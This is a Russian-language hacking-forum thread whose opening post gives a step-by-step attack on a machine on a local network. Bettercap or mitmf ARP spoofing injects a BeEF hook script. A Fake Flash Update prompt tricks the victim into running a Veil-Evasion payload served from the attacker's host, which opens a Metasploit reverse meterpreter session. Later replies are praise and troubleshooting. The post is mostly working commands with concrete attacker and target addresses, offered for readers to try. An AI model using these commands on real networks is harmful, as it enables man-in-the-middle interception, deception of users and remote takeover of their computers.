Соц.инженерия или как доставить полезную нагрузку

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем kot-gor, 28 ноя 2016.

  1. kot-gor

    kot-gor Well-Known Member
    Команда форума Grey Team

    Репутация:
    1
    Регистрация:
    7 сен 2016
    Сообщения:
    316
    Симпатии:
    303
    Всем привет.
    Сегодня я хочу рассказать как можно используя связку инструментов, получить доступ к удаленной машине в сегменте локальной сети.
    Данный материал предназначен для аудитории которая владеет навыками пользователя в среде линукс, так же есть понимания топологии сетей.
    Для этого нам понадобиться:
    1.Veil-Evasion.
    2.Metasploit.
    3.Beef.
    4 Bettercap ( Mitmf тоже подойдет ).
    Я не буду подробно останавливаться на установке и использовании Veil-Evasion ,
    кто не знаком с данным инструментом, у нас на форуме эту тему подробно описали,вот ссылка:
    https://codeby.net/forum/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/
    Metasploit и Beef стоят в самом дистрибутиве кали.
    Bettercap устанавливаем командой apt-get install bettercap
    Кто предпочитает mitmf, то иногда связка mitmf+Beef не корректно работает:

    Соц.инженерия или как доставить полезную нагрузку

    лечиться это следующей заплаткой
    easy_install -U pip
    pip install Twisted==15.5.0


    Отдельно хочу отметить инструмент для тестирования на проникновения Beef,
    это сокращение от Browser Exploitation Framework (фреймворк эксплуатации браузеров).
    Он позволяет выжать максимум из внедрения JS-кода.
    Я считаю что на данный момент это лучший инструмент для проведения XSS-атак.

    А сейчас давайте приступим к практической реализации.
    1. Запускаем фраемворк Beef , его можно запустить как из меню так и из консоли, если запускать из консоли то заходим в каталог используя следующую команду:

    cd /usr/share/beef-xss/
    ./beef

    Соц.инженерия или как доставить полезную нагрузку
    Консоль не закрываем!
    Далее открываем браузер и в строке вводим следующий адрес

    http://localhost:3000/ui/authentication

    Login: beef
    Pasword: beef

    Соц.инженерия или как доставить полезную нагрузку

    после не хитрых манипуляций попадаем в графический интерфейс управления фраемворка.


    Соц.инженерия или как доставить полезную нагрузку

    2.Далее открываем новую консоль и запускаем bettercap, в моем случае строка будет выглядеть следующим образом:

    sudo bettercap -T 192.168.0.109 --proxy-module injectjs --js-url "http://192.168.0.102:3000/hook.js"

    Соц.инженерия или как доставить полезную нагрузку

    где адрес 192.168.0.109 -эта машина в отношении которой производиться тестирование.
    адрес 192.168.0.102 -это адрес машины с которой мы атакуем.
    Консоль не закрываем!

    Если кто не знает, как узнать свой ip, то делается это командой ifconfig.

    Соц.инженерия или как доставить полезную нагрузку

    Кто предпочитает пользоваться инструментом mitmf, то строка будет выглядеть следующим образом:

    python mitmf.py -i wlan0 --target 192.168.0.109 --gateway 192.168.0.15 --arp --spoof --inject --js-url http://192.168.0.102:3000/hook.js

    wlan0-это интерфейс
    192.168.0.15 это адрес роутера, узнать его можно командой route -n

    Соц.инженерия или как доставить полезную нагрузку

    Далее нам нужно сгенерировать полезную нагрузку, для этого будем использовать инструмент Veil-Evasion.
    Еще раз повторюсь, по данной ссылке:
    https://codeby.net/forum/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/
    вы можете ознакомится с установкой, а так же, там подробно описано как создать нужный нам файл.

    После того как сгенерировали файл , нам нужно запустить сервер.
    я это делал в том же каталоге где была сгенерирована полезная нагрузка, следующей командой

    python -m SimpleHTTPServer 8081
    консоль не закрываем!

    Где 8081 это порт на котором у нас будет крутится сервер.(порт выбирайте произвольно, не обязательно брать такой как у меня.)
    Следующим шагом будет запуск метасплойта,(нужно же нам принимать чем то данные, от полезной нагрузки).:rolleyes:
    Это можно сделать двумя способами, самым простым на мой взгляд это в новой консоли написать строчку следующего содержания,в моем случае это будет выглядеть так
    msfconsole -r /usr/share/veil-output/handlers/load_flash_handler.rc

    Для тех кто не ищет легких путей:
    запускаем метасплойт командой: msfconsole
    далее вводим:

    use multi/handler
    set payload windows/meterpreter/reverse_https
    set LHOST 192.168.0.102
    (свой внутренний IP )
    set LPORT 4444 (вводим порт на котором будет слушаться полезная нагрузка, не путать с портом сервера!!!)
    exploit
    Консоль не закрываем!
    ПО ИТОГУ У НАС ДОЛЖНО БЫТЬ ОТКРЫТЫ ЧЕТЫРЕ КОНСОЛИ.

    Сейчас давайте вернемся к нашему фраемворку Beef, перед нами как вы видите, расположен графический интерфейс.
    Обратите внимание на крайнюю колонку ,слева сверху, там отображаются ip машин у которых браузеры, уязвимы к атаке xcc, и наш beef их подцепил.
    Дальше, мы выбираем наш подцепленный браузер и переходим во вкладку Commands.

    Соц.инженерия или как доставить полезную нагрузку

    Находим там пункт Social Engineering, далее Fake Flash Update, кликаем на нем, и перед нами откроется окно где вместо ip по умолчанию, нужно будет вставить наши данные.
    В моем случае это выглядит таким образом :
    http://192.168.0.102:3000/adobe/flash_update.png
    http://192.168.0.102:8081/flash_update12.exe

    Соц.инженерия или как доставить полезную нагрузку

    Далее в нижнем правом углу нажимаем на кнопку Execute.
    Если вы все сделали верно, то на машине у жерты появиться окно для обновления Adobe Flash Player.Как только жертва запустит обновление, у нас откроется сессия.

    На этом пока всё, спасибо за внимание. :)
     
    #1 kot-gor, 28 ноя 2016
    Последнее редактирование: 28 ноя 2016
    oleg68, Pushkinmazila, id2746 и 33 другим нравится это.
  2. krylovlf

    krylovlf Member

    Репутация:
    0
    Регистрация:
    25 окт 2016
    Сообщения:
    19
    Симпатии:
    7
    Очешуенно же)

    Давно сижу на форуме, всем спасибо, крайне приятно вас читать!
     
    Jmatis нравится это.
  3. z3RoTooL

    z3RoTooL Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    28 фев 2016
    Сообщения:
    490
    Симпатии:
    309
    лайк! мне было впадлу писать об этой связке )))) ты молодец. С меня репост.
     
    kot-gor нравится это.
  4. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Репутация:
    3
    Регистрация:
    16 янв 2016
    Сообщения:
    833
    Симпатии:
    1.658
    Отличная статья, спасибо!
     
  5. Lisenok

    Lisenok Member

    Репутация:
    0
    Регистрация:
    2 апр 2016
    Сообщения:
    24
    Симпатии:
    2
    Познавательно, буду пробовать)Благодарствую. Доучиться бы до момента когда сам смогу все это придумывать,находить.
     
  6. Lisenok

    Lisenok Member

    Репутация:
    0
    Регистрация:
    2 апр 2016
    Сообщения:
    24
    Симпатии:
    2
    Что за mitmf? у меня bettercap не пашет, ошибка такая "undefined method 'arp_opcode" for nil:NilClass" :( Если поможете буду благодарен!
     
  7. kot-gor

    kot-gor Well-Known Member
    Команда форума Grey Team

    Репутация:
    1
    Регистрация:
    7 сен 2016
    Сообщения:
    316
    Симпатии:
    303
    Обновите линукс: apt-get update && apt-get dist-upgrade.если не поможет, тогда рекомендую перeустановить линукс.Данная ошибка появляется из за библиотек и связана она с интерфейсом wlan.
    mitmf -это инструмент для проведения атак "Человек по середине" аналог bettercap.
     
  8. Lisenok

    Lisenok Member

    Репутация:
    0
    Регистрация:
    2 апр 2016
    Сообщения:
    24
    Симпатии:
    2
    попробую, что выйдет отпишу. благодарю!
     
  9. Knife

    Knife Member

    Репутация:
    0
    Регистрация:
    16 окт 2016
    Сообщения:
    6
    Симпатии:
    5
    За пределами локальной сети эта связка неосуществима получается?
     
  10. kot-gor

    kot-gor Well-Known Member
    Команда форума Grey Team

    Репутация:
    1
    Регистрация:
    7 сен 2016
    Сообщения:
    316
    Симпатии:
    303
    За пределами локальной сети другая связка, уязвимость xss по другому немного эксплуатируется..здесь я показал самый простой пример.
     
    #10 kot-gor, 2 дек 2016
    Последнее редактирование: 2 дек 2016
  11. Lamerman

    Lamerman Member

    Репутация:
    0
    Регистрация:
    29 ноя 2016
    Сообщения:
    18
    Симпатии:
    1
    Вопрос по Beef

    Код (Text):
    http://xxx.xxx.xxx.xxx:3000/hook.js
    вместо запуска, на экране открывается текст скрипта. С Beef ранее я работал, и понимаю как он должен, что в данный момент не так? Проверял с разных устройств и браузеров.
     
  12. kot-gor

    kot-gor Well-Known Member
    Команда форума Grey Team

    Репутация:
    1
    Регистрация:
    7 сен 2016
    Сообщения:
    316
    Симпатии:
    303
    если в браузере..то скорее всего у вас не запустился сервер на 3000 порту.
     
  13. _Eliot_

    _Eliot_ New Member

    Репутация:
    0
    Регистрация:
    15 ноя 2016
    Сообщения:
    4
    Симпатии:
    4
    Спасибо за интересную статью.:)
     
  14. Lamerman

    Lamerman Member

    Репутация:
    0
    Регистрация:
    29 ноя 2016
    Сообщения:
    18
    Симпатии:
    1
    Но в панель управления я зайти могу.Она тоже на 3000 стартует....
     
  15. kot-gor

    kot-gor Well-Known Member
    Команда форума Grey Team

    Репутация:
    1
    Регистрация:
    7 сен 2016
    Сообщения:
    316
    Симпатии:
    303
    можете скриншот показать с вашей проблемой?так будет проще. я просто не могу понять на каком этапе у вас это выскакивает
     
  16. Lamerman

    Lamerman Member

    Репутация:
    0
    Регистрация:
    29 ноя 2016
    Сообщения:
    18
    Симпатии:
    1
    http://images.vfl.ru/ii/1480678202/c0d8b8c6/15180450.jpg

    Соц.инженерия или как доставить полезную нагрузку
    Соц.инженерия или как доставить полезную нагрузку
    Соц.инженерия или как доставить полезную нагрузку

    Хочу обратить внимание - запуск идет не через beff-xss а через папку и ./beef
     
  17. MAdDog719

    MAdDog719 Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    16 авг 2016
    Сообщения:
    108
    Симпатии:
    26
    была таже проблема, решилась после переустановки кали
     
  18. Lamerman

    Lamerman Member

    Репутация:
    0
    Регистрация:
    29 ноя 2016
    Сообщения:
    18
    Симпатии:
    1

    Координальное решение =) Ради интереса, я скачал beef с гитхаба и поставил его - результат тот же, видимо что то не хватает ему для успешной работы.
     
  19. MAdDog719

    MAdDog719 Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    16 авг 2016
    Сообщения:
    108
    Симпатии:
    26
    Ну да)) за то сработало)
     
  20. kot-gor

    kot-gor Well-Known Member
    Команда форума Grey Team

    Репутация:
    1
    Регистрация:
    7 сен 2016
    Сообщения:
    316
    Симпатии:
    303
    У вас скорее всего нарушены зависимости библиотек
     
Загрузка...
Похожие Темы - Соц инженерия или
  1. Apton
    Ответов:
    16
    Просмотров:
    2.119
  2. ghost
    Ответов:
    21
    Просмотров:
    1.718
  3. Code Market
    Ответов:
    0
    Просмотров:
    8
  4. olegiva
    Ответов:
    0
    Просмотров:
    114
  5. JustMan
    Ответов:
    0
    Просмотров:
    198

Поделиться этой страницей